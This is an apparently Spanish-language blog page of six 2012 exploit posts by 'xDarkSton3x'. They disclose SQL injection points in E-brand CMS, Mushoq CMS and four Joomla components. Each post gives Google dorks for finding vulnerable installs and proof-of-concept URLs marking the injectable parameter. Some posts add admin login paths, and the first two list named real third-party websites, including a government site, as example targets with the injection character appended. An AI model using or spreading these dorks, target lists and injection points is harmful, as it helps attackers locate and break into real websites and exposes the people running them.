E-brand CMS Vuln SQL injection Vulnerability

Publicado por xDarkSton3x On 0:15 0 comentarios 

##################################################
# Exploit Title: E-brand CMS Vuln SQL injection Vulnerability
# Vendor: http://www.ebrand.com.br/
# Author: xDarkSton3x
# E-mail : xdarkston3x@msn.com
#Twitter: @xdarkston3x
# Category: webapps
# Google dork: intext:desenvolvido por e-brand
# Example Sites : 
http://www.institutotommasi.org.br/projeto_selecionado.php?Cod_Projeto='
http://www.esconvention.com.br/turismo/evento_escolhido.asp?Cod_Evento='
http://www.quintelatorres.com.br/noticias_interno.php?Cod_Noticia='
http://www.landsteiner.com.br/noticias.php?Cod_NoticiaCategoria='
http://www.geres.gov.br/noticias_detalhe.php?Cod_Noticia='
http://www.vitoriahospitalar.com.br/evento-detalhe.php?evento='
http://www.novapol.com.br/produto.php?Cod_Produto='
http://www.cecon.med.br/dicas-detalhe.php?iDica='

##################################################

[~]Exploit/p0c :
http://www.site.com/x.php?var=[sqli]

[~]Panel Admin :
/adm/login.php
/adm/


[~]Reporte :
http://www.1337day.com/exploits/18083

http://w00t.pro/2012/04/20/2782/
edit post

Mushoq CMS SQL injection Vulnerability

Publicado por xDarkSton3x On 0:11 0 comentarios 

##################################################
# Exploit Title: Mushoq CMS SQL injection Vulnerability
# Vendor: http://www.mushoq.com/
# Author: xDarkSton3x
# E-mail : xdarkston3x@msn.com
#Twitter: @xdarkston3x
# Category: webapps
# Google dork: intext:desarrollo Web mushoq inurl:index.php?idSeccion=
# Example Sites : 
http://www.clave.com.ec/index.php?idSeccion=%27
http://www.edesa.com.ec/index.php?idSeccion=%27
http://www.rvc.com.ec/index.php?idSeccion=%27
http://www.cip.org.ec/index.php?idSeccion=%27
http://www.cgbseguridad.com/index.php?idSeccion=%27
http://www.verdesintetico.com/index.php?idSeccion=%27

##################################################

[~]Exploit/p0c :
http://www.site.com/index.php?idSeccion=[sqli]



[~]Reporte :


http://www.1337day.com/exploits/18096


http://w00t.pro/2012/04/21/2841/

























edit post




















joomla component (com_joomleague) SQL injection Vulnerability





Publicado por
xDarkSton3x



        On
      
0:03


0
comentarios











##################################################
# Exploit Title: joomla component (com_joomleague) SQL injection Vulnerability
#Vendor: http://www.joomleague.net/
# Date: 22/04/2012
# Author: xDarkSton3x
# E-mail : xdarkston3x@msn.com
# Category:: webapps
# Example Sites : 
http://www.joomleague.net/index.php?option=com_joomleague&view=resultsmatrix&p=4&Itemid='
http://www.cdovalle.cl/index.php?option=com_joomleague&func=showNextMatch&p=9'

# Tested on: linux + windows
##################################################

[~]Exploit/p0c :
http://www.site.com/index.php?option=com_joomleague&view=resultsmatrix&p=4&Itemid=[sqli]
http://www.site.com/index.php?option=com_joomleague&func=showNextMatch&p=[sqli]




[~]Reporte :


http://www.1337day.com/exploits/18114































edit post




















Webapps [ joomla component (com_photomapgallery) ]





Publicado por
xDarkSton3x



        On
      
19:30


0
comentarios









# Exploit Title: joomla component (com_photomapgallery)SQL injection Vulnerability
# Download : http://extensions.joomla.org/extensions/photos-a-images/photo-gallery/10658
# Date: 10/04/2012
# Author: xDarkSton3x
# E-mail : xdarkston3x@msn.com
# Category: webapps
# Google dork: inurl:com_photomapgallery

##################################################

[~]Exploit/p0c :
http://www.site.com/index.php?option=com_photomapgallery&view=photogallery&id=&Itemid=[sqli]
[~]Reporte :
http://www.1337day.com/exploits/18035


















,
,






edit post




















Webapps [ joomla component (com_estateagent) ]





Publicado por
xDarkSton3x



        On
      
8:07


0
comentarios









# Exploit Title: joomla component (com_estateagent) SQL injection Vulnerability
# Date: 10/04/2012
# Author: xDarkSton3x
# E-mail : xdarkston3x@msn.com
# Category:: webapps
# Google dork: inurl:"com_estateagent"
# Tested on: linux + windows
# Vendor link: http://www.eaimproved.eu/index.php
##################################################
 
[~]Exploit/p0c :
http://site/index.php?option=com_estateagent&Itemid=&act=object&task=showEO&id='







[~]Reporte :
http://www.1337day.com/exploits/18029
http://www.exploit-db.com/exploits/18728/


















,
,






edit post




















Webapps [ joomla component (com_bearleague) ]





Publicado por
xDarkSton3x



        On
      
8:04


0
comentarios









# Exploit Title: joomla component (com_bearleague) SQL injection Vulnerability
# Date: 10/04/2012
# Author: xDarkSton3x
# E-mail : xdarkston3x@msn.com
# Category:: webapps
# Google dork: inurl:com_bearleague
# Vendor: http://beardev.com/
# Tested on: linux + windows
##################################################
 
[~]Exploit/p0c :
http://site.com/index.php?option=com_bearleague&task=team&tid=8&sid=1&Itemid=%27
[~]Reportes :
http://www.1337day.com/exploits/18032
http://www.exploit-db.com/exploits/18729/


















,
,






edit post